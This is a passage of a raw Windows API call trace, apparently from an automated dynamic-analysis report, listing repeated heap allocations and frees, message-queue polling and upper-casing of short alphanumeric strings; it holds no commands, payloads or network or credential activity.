lpMsg=0x8bf250) returned 0 [0187.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0187.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0187.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.714] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0187.714] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.714] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.715] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.715] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.715] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0187.715] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.715] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0187.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0187.715] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0187.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0187.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0187.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0187.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.729] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0187.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0187.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0187.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0187.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.729] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0187.730] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0187.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.730] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0187.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0187.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.732] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0187.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0187.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0187.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.733] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0187.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0187.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0187.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0187.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0187.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0187.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.734] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0187.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0187.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0187.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0187.735] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0187.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0187.735] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0187.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0187.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.736] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0187.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0187.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0187.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.736] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0187.736] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0187.737] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0187.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0187.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0187.737] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0187.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.737] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0187.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0187.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.738] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0187.738] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0187.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0187.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0187.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0187.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0187.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0187.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0187.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0187.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0187.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.739] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0187.739] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 